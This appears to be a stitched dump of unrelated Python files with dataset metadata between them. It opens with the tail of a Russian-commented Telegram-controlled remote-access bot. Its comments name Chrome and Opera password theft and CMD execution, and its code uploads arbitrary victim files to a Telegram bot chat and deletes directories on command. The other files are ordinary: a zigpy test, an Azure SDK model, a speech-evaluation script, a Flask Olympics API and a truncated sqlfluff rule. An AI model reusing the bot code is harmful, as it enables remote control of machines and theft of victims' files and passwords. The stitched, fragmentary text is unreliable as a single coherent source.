введен неверно!") @bot.message_handler(commands=["cd", "Cd"]) # ПЕРЕЙТИ В ПАПКУ def cddir(message): try: user_msg = "{0}".format(message.text) # Переменная принемающая сообщение от юзера folder = user_msg.split(" ")[1] os.chdir(folder) bot.send_message(chat_id, "Директория изменена на " + folder) except: bot.send_message(chat_id, "Ошибка! Папка введена неправильно!") @bot.message_handler(commands =["Download", "download"]) # ЗАГРУЗКА ФАЙЛА def downloadfile(message): try: user_msg = "{0}".format(message.text) docc = user_msg.split(" ")[1] # Переменная, в которой содержится имя файла doccc = {'document': open(docc,'rb')} # Переменная для POST запроса requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=doccc) # Отправляем файл except: bot.send_message(chat_id, "Ошибка! Файл введен неверно!") @bot.message_handler(commands = ["deldir", "Deldir"]) # УДАЛИТЬ ПАПКУ def deletedir(message): try: user_msg = "{0}".format(message.text) # Переменная принемающая сообщение от юзера path2del = user_msg.split(" ")[1] os.removedirs(path2del) bot.send_message(chat_id, "Директория " + path2del + " удалена") except: bot.send_message(chat_id, "Ошибка! Папка введена неверно!") bot.polling()
ru
0.988867
# # ПАРОЛИ # Если сообщение /passwords chrome # ИначеЕсли текст /passwords opera # ИНФОРМАЦИЯ # ДИРЕКТОРИЯ # ПРОЦЕССЫ # CMD # Отправка сообщения # ОТКРЫТЬ ССЫЛКУ # ВСЕ ФАЙЛЫ # ПЕРЕЙТИ В ПАПКУ # Переменная принемающая сообщение от юзера # ЗАГРУЗКА ФАЙЛА # Переменная, в которой содержится имя файла # Переменная для POST запроса # Отправляем файл # УДАЛИТЬ ПАПКУ # Переменная принемающая сообщение от юзера
2.25546
2
tests/test_kof.py
danielbrunt57/zha-device-handlers
0
6628966
<gh_stars>0 """Tests for KOF.""" from unittest import mock import zigpy.device import zigpy.endpoint import zigpy.quirks import zhaquirks.kof.kof_mr101z def test_kof_no_reply(): """Test KOF No reply.""" class TestCluster( zhaquirks.kof.kof_mr101z.NoReplyMixin, zigpy.quirks.CustomCluster ): """Test Cluster Class.""" cluster_id = 0x1234 void_input_commands = [0x0002] server_commands = { 0x0001: ("noop", (), False), 0x0002: ("noop_noreply", (), False), } client_commands = {} end_point = mock.MagicMock() cluster = TestCluster(end_point) cluster.command(0x0001) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=True, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0001, expect_reply=False) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=False, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0002) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=False, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0002, expect_reply=True) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=True, command_id=mock.ANY ) end_point.reset_mock()
"""Tests for KOF.""" from unittest import mock import zigpy.device import zigpy.endpoint import zigpy.quirks import zhaquirks.kof.kof_mr101z def test_kof_no_reply(): """Test KOF No reply.""" class TestCluster( zhaquirks.kof.kof_mr101z.NoReplyMixin, zigpy.quirks.CustomCluster ): """Test Cluster Class.""" cluster_id = 0x1234 void_input_commands = [0x0002] server_commands = { 0x0001: ("noop", (), False), 0x0002: ("noop_noreply", (), False), } client_commands = {} end_point = mock.MagicMock() cluster = TestCluster(end_point) cluster.command(0x0001) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=True, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0001, expect_reply=False) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=False, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0002) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=False, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0002, expect_reply=True) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=True, command_id=mock.ANY ) end_point.reset_mock()
en
0.856493
Tests for KOF. Test KOF No reply. Test Cluster Class.
2.276341
2
azure-mgmt-iothub/azure/mgmt/iothub/models/iot_hub_sku_info.py
v-Ajnava/azure-sdk-for-python
4
6628967
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class IotHubSkuInfo(Model): """Information about the SKU of the IoT hub. Variables are only populated by the server, and will be ignored when sending a request. :param name: The name of the SKU. Possible values include: 'F1', 'S1', 'S2', 'S3' :type name: str or :class:`IotHubSku <azure.mgmt.iothub.models.IotHubSku>` :ivar tier: The billing tier for the IoT hub. Possible values include: 'Free', 'Standard' :vartype tier: str or :class:`IotHubSkuTier <azure.mgmt.iothub.models.IotHubSkuTier>` :param capacity: The number of provisioned IoT Hub units. See: https://docs.microsoft.com/azure/azure-subscription-service-limits#iot-hub-limits. :type capacity: long """ _validation = { 'name': {'required': True}, 'tier': {'readonly': True}, 'capacity': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'tier': {'key': 'tier', 'type': 'IotHubSkuTier'}, 'capacity': {'key': 'capacity', 'type': 'long'}, } def __init__(self, name, capacity): self.name = name self.tier = None self.capacity = capacity
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class IotHubSkuInfo(Model): """Information about the SKU of the IoT hub. Variables are only populated by the server, and will be ignored when sending a request. :param name: The name of the SKU. Possible values include: 'F1', 'S1', 'S2', 'S3' :type name: str or :class:`IotHubSku <azure.mgmt.iothub.models.IotHubSku>` :ivar tier: The billing tier for the IoT hub. Possible values include: 'Free', 'Standard' :vartype tier: str or :class:`IotHubSkuTier <azure.mgmt.iothub.models.IotHubSkuTier>` :param capacity: The number of provisioned IoT Hub units. See: https://docs.microsoft.com/azure/azure-subscription-service-limits#iot-hub-limits. :type capacity: long """ _validation = { 'name': {'required': True}, 'tier': {'readonly': True}, 'capacity': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'tier': {'key': 'tier', 'type': 'IotHubSkuTier'}, 'capacity': {'key': 'capacity', 'type': 'long'}, } def __init__(self, name, capacity): self.name = name self.tier = None self.capacity = capacity
en
0.570188
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- Information about the SKU of the IoT hub. Variables are only populated by the server, and will be ignored when sending a request. :param name: The name of the SKU. Possible values include: 'F1', 'S1', 'S2', 'S3' :type name: str or :class:`IotHubSku <azure.mgmt.iothub.models.IotHubSku>` :ivar tier: The billing tier for the IoT hub. Possible values include: 'Free', 'Standard' :vartype tier: str or :class:`IotHubSkuTier <azure.mgmt.iothub.models.IotHubSkuTier>` :param capacity: The number of provisioned IoT Hub units. See: https://docs.microsoft.com/azure/azure-subscription-service-limits#iot-hub-limits. :type capacity: long
1.784634
2
src/glue.py
karlotimmerman/glue
14
6628968
''' GLUE - THE TOOLKIT FOR MICROSOFT COGNITIVE SERVICES ''' ''' <EMAIL> ''' ''' Supports Text-To-Speech (TTS), Speech-To-Text (STT), Evaluation, LUIS-Scoring ''' # Import standard packages import os import sys import shutil import logging import argparse import pandas as pd # Import custom modules import stt import tts import luis_scoring as luis import params as pa import helper as he import evaluate as eval ''' COMMAND EXAMPLES ''' # python .\src\glue.py --do_synthesize --input input/scoringfile.txt # Parse arguments parser = argparse.ArgumentParser() args = pa.get_params(parser) # Set arguments fname = args.input audio_files = args.audio do_synthesize = args.do_synthesize do_scoring = args.do_scoring do_transcribe = args.do_transcribe do_evaluate = args.do_evaluate # Get config from file pa.get_config() # Set logging level to INFO logging.getLogger().setLevel(logging.INFO) if __name__ == '__main__': logging.info('[INFO] - Starting GLUE - v0.2') # Case Management if any([do_scoring, do_synthesize, do_transcribe, do_evaluate]): output_folder, case = he.create_case(pa.output_folder) logging.info(f'[INFO] - Created case {case}') try: os.makedirs(f"{output_folder}/{case}/input", exist_ok=True) shutil.copyfile(fname, f'{output_folder}/{case}/input/{os.path.basename(fname)}') df_reference = pd.read_csv(f'{output_folder}/{case}/input/{os.path.basename(fname)}', sep=',', encoding='utf-8', index_col=None) logging.info(f'[INFO] - Copied input file(s) to case folder') except Exception as e: if do_synthesize or do_scoring: logging.error(f'[ERROR] - Error with input file or FileNotFound, but it is required for --do_transcribe and/or --do_scoring -> {e}') sys.exit() else: logging.warning('[WARNING] - Could not find input file, but we can continue here') df_reference = pd.DataFrame() else: logging.error('[ERROR] - Please activate at least one of the following modes: --do_synthesize, --do_transcribe, --do_scoring, --do_evaluate (see --help for further information)!') sys.exit() # TTS if do_synthesize: logging.info(f'[INFO] - Starting text-to-speech synthetization of {len(df_reference)} utterances') df_reference = tts.main(df_reference, f'{output_folder}/{case}') df_reference[['audio_synth', 'text']].to_csv(f'{output_folder}/{case}/tts_transcription.txt', sep = "\t", header = None, index = False) df_reference[['audio_synth', 'text']].to_csv(f'{output_folder}/{case}/tts_transcription.csv', sep = ",", index = False) logging.info(f'[INFO] - Finished text-to-speech synthetization of {len(df_reference)} utterances and wrote output files') # STT if do_transcribe: if audio_files != None: logging.info('[INFO] - Starting with speech-to-text conversion') stt_results = stt.main(f'{audio_files}/', f'{output_folder}/{case}') df_transcription = pd.DataFrame(list(stt_results), columns=['audio', 'rec']) logging.debug(df_transcription) df_transcription.to_csv(f'{output_folder}/{case}/stt_transcriptions.txt', sep = '\t', header = None, index=False) # Merge reference transcriptions with recognition on audio file names if 'audio' in list(df_reference.columns): df_reference = pd.merge(left = df_reference, right = df_transcription, how = 'left', on = 'audio') logging.info(f'[INFO] - Merged imported reference transcriptions and recognitions') df_reference.to_csv(f'{output_folder}/{case}/transcriptions_full.csv', sep = ',', encoding = 'utf-8', index = False) logging.info(f'[INFO] - Wrote transcription file to case folder') else: logging.error('[ERROR] - It seems like you did not pass a path to audio files, cannot do transcriptions') sys.exit() # Speech Evaluation if do_evaluate: logging.info('[INFO] - Starting with reference vs. recognition evaluation') if 'text' in list(df_reference.columns) and 'rec' in list(df_reference.columns): eval.main(df_reference) logging.info('[INFO] - Evaluated reference and recognition transcriptions') else: logging.error('[ERROR] - Cannot do evaluation, please verify that you both have "text" and "rec" in your data!') # LUIS Scoring if do_scoring: logging.info('[INFO] - Starting with LUIS scoring') logging.info(f'[INFO] - Set LUIS treshold to {pa.luis_treshold}') if 'intent' in list(df_reference.columns) and not 'rec' in list(df_reference.columns): luis_scoring = luis.main(df_reference, 'text') elif all(['intent' in list(df_reference.columns), 'rec' in list(df_reference.columns)]): luis_scoring = luis.main(df_reference, 'text') luis_scoring = luis.main(df_reference, 'rec') elif 'intent' in list(df_reference.columns) and not 'text' in list(df_reference.columns): luis_scoring = luis.main(df_reference, 'rec') else: logging.error('[ERROR] - Cannot do LUIS scoring, please verify that you have an "intent"-column in your data.') # Write to output file luis_scoring['luis_treshold'] = pa.luis_treshold luis_scoring.to_csv(f'{output_folder}/{case}/luis_scoring.csv', sep = ',', encoding = 'utf-8', index=False) # Finish run logging.info(f'[INFO] - Finished with the run {case}!')
''' GLUE - THE TOOLKIT FOR MICROSOFT COGNITIVE SERVICES ''' ''' <EMAIL> ''' ''' Supports Text-To-Speech (TTS), Speech-To-Text (STT), Evaluation, LUIS-Scoring ''' # Import standard packages import os import sys import shutil import logging import argparse import pandas as pd # Import custom modules import stt import tts import luis_scoring as luis import params as pa import helper as he import evaluate as eval ''' COMMAND EXAMPLES ''' # python .\src\glue.py --do_synthesize --input input/scoringfile.txt # Parse arguments parser = argparse.ArgumentParser() args = pa.get_params(parser) # Set arguments fname = args.input audio_files = args.audio do_synthesize = args.do_synthesize do_scoring = args.do_scoring do_transcribe = args.do_transcribe do_evaluate = args.do_evaluate # Get config from file pa.get_config() # Set logging level to INFO logging.getLogger().setLevel(logging.INFO) if __name__ == '__main__': logging.info('[INFO] - Starting GLUE - v0.2') # Case Management if any([do_scoring, do_synthesize, do_transcribe, do_evaluate]): output_folder, case = he.create_case(pa.output_folder) logging.info(f'[INFO] - Created case {case}') try: os.makedirs(f"{output_folder}/{case}/input", exist_ok=True) shutil.copyfile(fname, f'{output_folder}/{case}/input/{os.path.basename(fname)}') df_reference = pd.read_csv(f'{output_folder}/{case}/input/{os.path.basename(fname)}', sep=',', encoding='utf-8', index_col=None) logging.info(f'[INFO] - Copied input file(s) to case folder') except Exception as e: if do_synthesize or do_scoring: logging.error(f'[ERROR] - Error with input file or FileNotFound, but it is required for --do_transcribe and/or --do_scoring -> {e}') sys.exit() else: logging.warning('[WARNING] - Could not find input file, but we can continue here') df_reference = pd.DataFrame() else: logging.error('[ERROR] - Please activate at least one of the following modes: --do_synthesize, --do_transcribe, --do_scoring, --do_evaluate (see --help for further information)!') sys.exit() # TTS if do_synthesize: logging.info(f'[INFO] - Starting text-to-speech synthetization of {len(df_reference)} utterances') df_reference = tts.main(df_reference, f'{output_folder}/{case}') df_reference[['audio_synth', 'text']].to_csv(f'{output_folder}/{case}/tts_transcription.txt', sep = "\t", header = None, index = False) df_reference[['audio_synth', 'text']].to_csv(f'{output_folder}/{case}/tts_transcription.csv', sep = ",", index = False) logging.info(f'[INFO] - Finished text-to-speech synthetization of {len(df_reference)} utterances and wrote output files') # STT if do_transcribe: if audio_files != None: logging.info('[INFO] - Starting with speech-to-text conversion') stt_results = stt.main(f'{audio_files}/', f'{output_folder}/{case}') df_transcription = pd.DataFrame(list(stt_results), columns=['audio', 'rec']) logging.debug(df_transcription) df_transcription.to_csv(f'{output_folder}/{case}/stt_transcriptions.txt', sep = '\t', header = None, index=False) # Merge reference transcriptions with recognition on audio file names if 'audio' in list(df_reference.columns): df_reference = pd.merge(left = df_reference, right = df_transcription, how = 'left', on = 'audio') logging.info(f'[INFO] - Merged imported reference transcriptions and recognitions') df_reference.to_csv(f'{output_folder}/{case}/transcriptions_full.csv', sep = ',', encoding = 'utf-8', index = False) logging.info(f'[INFO] - Wrote transcription file to case folder') else: logging.error('[ERROR] - It seems like you did not pass a path to audio files, cannot do transcriptions') sys.exit() # Speech Evaluation if do_evaluate: logging.info('[INFO] - Starting with reference vs. recognition evaluation') if 'text' in list(df_reference.columns) and 'rec' in list(df_reference.columns): eval.main(df_reference) logging.info('[INFO] - Evaluated reference and recognition transcriptions') else: logging.error('[ERROR] - Cannot do evaluation, please verify that you both have "text" and "rec" in your data!') # LUIS Scoring if do_scoring: logging.info('[INFO] - Starting with LUIS scoring') logging.info(f'[INFO] - Set LUIS treshold to {pa.luis_treshold}') if 'intent' in list(df_reference.columns) and not 'rec' in list(df_reference.columns): luis_scoring = luis.main(df_reference, 'text') elif all(['intent' in list(df_reference.columns), 'rec' in list(df_reference.columns)]): luis_scoring = luis.main(df_reference, 'text') luis_scoring = luis.main(df_reference, 'rec') elif 'intent' in list(df_reference.columns) and not 'text' in list(df_reference.columns): luis_scoring = luis.main(df_reference, 'rec') else: logging.error('[ERROR] - Cannot do LUIS scoring, please verify that you have an "intent"-column in your data.') # Write to output file luis_scoring['luis_treshold'] = pa.luis_treshold luis_scoring.to_csv(f'{output_folder}/{case}/luis_scoring.csv', sep = ',', encoding = 'utf-8', index=False) # Finish run logging.info(f'[INFO] - Finished with the run {case}!')
en
0.475288
GLUE - THE TOOLKIT FOR MICROSOFT COGNITIVE SERVICES <EMAIL> Supports Text-To-Speech (TTS), Speech-To-Text (STT), Evaluation, LUIS-Scoring # Import standard packages # Import custom modules COMMAND EXAMPLES # python .\src\glue.py --do_synthesize --input input/scoringfile.txt # Parse arguments # Set arguments # Get config from file # Set logging level to INFO # Case Management # TTS # STT # Merge reference transcriptions with recognition on audio file names # Speech Evaluation # LUIS Scoring # Write to output file # Finish run
2.333995
2
olympics/olympics-api.py
robbie-young/cs257
0
6628969
<reponame>robbie-young/cs257<gh_stars>0 ''' olympics-api.py Authors: <NAME>, 28 October 2021 For use in the 'olympics' project in Carleton's CS257 course, Fall term ''' import flask import json import psycopg2 import argparse import config from config import database as config_database from config import user as config_user from config import password as config_password app = flask.Flask(__name__) def connect(connect_database, connect_user, connect_password): try: connection = psycopg2.connect(database=connect_database, user=connect_user, password=connect_password) return connection except Exception as e: print(e) exit() @app.route('/') def base(): return ''' [̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅] ''' @app.route('/games') def games(): connection = connect(config_database, config_user, config_password) query = '''SELECT games.id, games.year, seasons.season, games.city FROM games, seasons WHERE games.season_id = seasons.id ORDER BY games.year''' try: cursor = connection.cursor() cursor.execute(query) except Exception as e: print(e) exit() games_list = [] for game in cursor: game_dict = {} game_dict['id'] = game[0] game_dict['year'] = game[1] game_dict['season'] = game[2] game_dict['city'] = game[3] games_list.append(game_dict) connection.close() return json.dumps(games_list) @app.route('/nocs') def nocs(): connection = connect(config_database, config_user, config_password) query = '''SELECT DISTINCT noc_regions.noc, noc_regions.region FROM noc_regions ORDER BY noc''' try: cursor = connection.cursor() cursor.execute(query) except Exception as e: print(e) exit() noc_list = [] for noc in cursor: noc_dict = {} noc_dict['abbreviation'] = noc[0] noc_dict['name'] = noc[1] noc_list.append(noc_dict) connection.close() return json.dumps(noc_list) @app.route('/medalists/games/<games_id>') def medalists(games_id): connection = connect(config_database, config_user, config_password) noc = flask.request.args.get('noc') query = '''SELECT DISTINCT athletes.id, athlete_names.name, athletes.sex, sports.sport, events.event, medals.medal FROM athlete_names, athletes, sports, events, medals, noc_regions, super_table WHERE athlete_names.id = athletes.name_id AND super_table.athlete_id = athletes.id AND sports.id = events.sport_id AND super_table.event_id = events.id AND super_table.medal_id = medals.id AND medals.medal NOT LIKE 'NA' AND super_table.game_id = %s''' try: cursor = connection.cursor() if noc is not None: query += '''AND noc_regions.noc LIKE %s AND super_table.noc_region_id = noc_regions.id''' cursor.execute(query, (games_id, noc)) else: cursor.execute(query, (games_id, )) except Exception as e: print(e) exit() medalists_list = [] for medalist in cursor: medalist_dict = {} medalist_dict['athlete_id'] = medalist[0] medalist_dict['athlete_name'] = medalist[1] medalist_dict['athlete_sex'] = medalist[2] medalist_dict['sport'] = medalist[3] medalist_dict['event'] = medalist[4] medalist_dict['medal'] = medalist[5] medalists_list.append(medalist_dict) connection.close() return json.dumps(medalists_list) def main(): # print(base()) # print(games()) # print(nocs()) # print(medalists(1)) parser = argparse.ArgumentParser('A sample Flask application/API') parser.add_argument('host', help='the host on which this application is running') parser.add_argument('port', type=int, help='the port on which this application is listening') arguments = parser.parse_args() app.run(host=arguments.host, port=arguments.port, debug=True) if __name__ == '__main__': main()
''' olympics-api.py Authors: <NAME>, 28 October 2021 For use in the 'olympics' project in Carleton's CS257 course, Fall term ''' import flask import json import psycopg2 import argparse import config from config import database as config_database from config import user as config_user from config import password as config_password app = flask.Flask(__name__) def connect(connect_database, connect_user, connect_password): try: connection = psycopg2.connect(database=connect_database, user=connect_user, password=connect_password) return connection except Exception as e: print(e) exit() @app.route('/') def base(): return ''' [̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅] ''' @app.route('/games') def games(): connection = connect(config_database, config_user, config_password) query = '''SELECT games.id, games.year, seasons.season, games.city FROM games, seasons WHERE games.season_id = seasons.id ORDER BY games.year''' try: cursor = connection.cursor() cursor.execute(query) except Exception as e: print(e) exit() games_list = [] for game in cursor: game_dict = {} game_dict['id'] = game[0] game_dict['year'] = game[1] game_dict['season'] = game[2] game_dict['city'] = game[3] games_list.append(game_dict) connection.close() return json.dumps(games_list) @app.route('/nocs') def nocs(): connection = connect(config_database, config_user, config_password) query = '''SELECT DISTINCT noc_regions.noc, noc_regions.region FROM noc_regions ORDER BY noc''' try: cursor = connection.cursor() cursor.execute(query) except Exception as e: print(e) exit() noc_list = [] for noc in cursor: noc_dict = {} noc_dict['abbreviation'] = noc[0] noc_dict['name'] = noc[1] noc_list.append(noc_dict) connection.close() return json.dumps(noc_list) @app.route('/medalists/games/<games_id>') def medalists(games_id): connection = connect(config_database, config_user, config_password) noc = flask.request.args.get('noc') query = '''SELECT DISTINCT athletes.id, athlete_names.name, athletes.sex, sports.sport, events.event, medals.medal FROM athlete_names, athletes, sports, events, medals, noc_regions, super_table WHERE athlete_names.id = athletes.name_id AND super_table.athlete_id = athletes.id AND sports.id = events.sport_id AND super_table.event_id = events.id AND super_table.medal_id = medals.id AND medals.medal NOT LIKE 'NA' AND super_table.game_id = %s''' try: cursor = connection.cursor() if noc is not None: query += '''AND noc_regions.noc LIKE %s AND super_table.noc_region_id = noc_regions.id''' cursor.execute(query, (games_id, noc)) else: cursor.execute(query, (games_id, )) except Exception as e: print(e) exit() medalists_list = [] for medalist in cursor: medalist_dict = {} medalist_dict['athlete_id'] = medalist[0] medalist_dict['athlete_name'] = medalist[1] medalist_dict['athlete_sex'] = medalist[2] medalist_dict['sport'] = medalist[3] medalist_dict['event'] = medalist[4] medalist_dict['medal'] = medalist[5] medalists_list.append(medalist_dict) connection.close() return json.dumps(medalists_list) def main(): # print(base()) # print(games()) # print(nocs()) # print(medalists(1)) parser = argparse.ArgumentParser('A sample Flask application/API') parser.add_argument('host', help='the host on which this application is running') parser.add_argument('port', type=int, help='the port on which this application is listening') arguments = parser.parse_args() app.run(host=arguments.host, port=arguments.port, debug=True) if __name__ == '__main__': main()
en
0.481259
olympics-api.py Authors: <NAME>, 28 October 2021 For use in the 'olympics' project in Carleton's CS257 course, Fall term [̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅] SELECT games.id, games.year, seasons.season, games.city FROM games, seasons WHERE games.season_id = seasons.id ORDER BY games.year SELECT DISTINCT noc_regions.noc, noc_regions.region FROM noc_regions ORDER BY noc SELECT DISTINCT athletes.id, athlete_names.name, athletes.sex, sports.sport, events.event, medals.medal FROM athlete_names, athletes, sports, events, medals, noc_regions, super_table WHERE athlete_names.id = athletes.name_id AND super_table.athlete_id = athletes.id AND sports.id = events.sport_id AND super_table.event_id = events.id AND super_table.medal_id = medals.id AND medals.medal NOT LIKE 'NA' AND super_table.game_id = %s AND noc_regions.noc LIKE %s AND super_table.noc_region_id = noc_regions.id # print(base()) # print(games()) # print(nocs()) # print(medalists(1))
3.378283
3
openpype/modules/default_modules/ftrack/interfaces.py
yosuperdope/OpenPype
0
6628970
from abc import abstractmethod from openpype.modules import OpenPypeInterface class IFtrackEventHandlerPaths(OpenPypeInterface): """Other modules interface to return paths to ftrack event handlers. Expected output is dictionary with "server" and "user" keys. """ @abstractmethod def get_event_handler_paths(self): pass
from abc import abstractmethod from openpype.modules import OpenPypeInterface class IFtrackEventHandlerPaths(OpenPypeInterface): """Other modules interface to return paths to ftrack event handlers. Expected output is dictionary with "server" and "user" keys. """ @abstractmethod def get_event_handler_paths(self): pass
en
0.846927
Other modules interface to return paths to ftrack event handlers. Expected output is dictionary with "server" and "user" keys.
2.619809
3
src/sqlfluff/rules/L042.py
fdw/sqlfluff
0
6628971
<reponame>fdw/sqlfluff """Implementation of Rule L042.""" from typing import Optional from sqlfluff.core.rules.base import BaseRule, LintResult, RuleContext from sqlfluff.core.rules.doc_decorators import document_configuration from sqlfluff.core.rules.functional.segment_predicates import is_type @document_configuration class Rule_L042(BaseRule): """Join/From clauses should not contain subqueries. Use CTEs instead. By default this rule is configured to allow subqueries within ``FROM`` clauses but not within ``JOIN`` clauses. If you prefer a stricter lint then this is configurable. NB: Some dialects don't allow CTEs, and for those dialects this rule makes no sense and should be disabled. | **Anti-pattern** .. code-block:: sql select a.x, a.y, b.z from a join ( select x, z from b ) using(x) | **Best practice** .. code-block:: sql with c as ( select x, z from b ) select a.x, a.y, c.z from a join c using(x) """ config_keywords = ["forbid_subquery_in"] _config_mapping = { "join": ["join_clause"], "from": ["from_expression"], "both": ["join_clause", "from_expression"], } def _eval(self, context: RuleContext) -> Optional[LintResult]: """Join/From clauses should not contain subqueries. Use CTEs instead. NB: No fix for this routine because it would be very complex to implement reliably. """ parent_types = self._config_mapping[self.forbid_subquery_in] # type: ignore for parent_type in parent_types: if context.segment.is_type(parent_type): # Get the referenced table segment from_expression_element = context.functional.segment.children( is_type("from_expression_element") ).children(is_type("table_expression")) # Is it bracketed? If so, lint that instead. bracketed_expression = from_expression_element.children( is_type("bracketed") ) if bracketed_expression: from_expression_element = bracketed_expression # If we find a child with a "problem" type, raise an issue. # If not, we're fine. seg = from_expression_element.children( is_type( "with_compound_statement", "set_expression", "select_statement", ) ) if seg: return LintResult( anchor=seg[0], description=f"{parent_type} clauses should not contain subqueries. Use CTEs instead", ) return None
"""Implementation of Rule L042.""" from typing import Optional from sqlfluff.core.rules.base import BaseRule, LintResult, RuleContext from sqlfluff.core.rules.doc_decorators import document_configuration from sqlfluff.core.rules.functional.segment_predicates import is_type @document_configuration class Rule_L042(BaseRule): """Join/From clauses should not contain subqueries. Use CTEs instead. By default this rule is configured to allow subqueries within ``FROM`` clauses but not within ``JOIN`` clauses. If you prefer a stricter lint then this is configurable. NB: Some dialects don't allow CTEs, and for those dialects this rule makes no sense and should be disabled. | **Anti-pattern** .. code-block:: sql select a.x, a.y, b.z from a join ( select x, z from b ) using(x) | **Best practice** .. code-block:: sql with c as ( select x, z from b ) select a.x, a.y, c.z from a join c using(x) """ config_keywords = ["forbid_subquery_in"] _config_mapping = { "join": ["join_clause"], "from": ["from_expression"], "both": ["join_clause", "from_expression"], } def _eval(self, context: RuleContext) -> Optional[LintResult]: """Join/From clauses should not contain subqueries. Use CTEs instead. NB: No fix for this routine because it would be very complex to implement reliably. """ parent_types = self._config_mapping[self.forbid_subquery_in] # type: ignore for parent_type in parent_types: if context.segment.is_type(parent_type): # Get the referenced table segment from_expression_element = context.functional.segment.children( is_type("from_expression_element") ).children(is_type("table_expression")) # Is it bracketed? If so, lint that instead. bracketed_expression = from_expression_element.children( is_type("bracketed") ) if bracketed_expression: from_expression_element = bracketed_expression # If we find a child with a "problem" type, raise an issue. # If 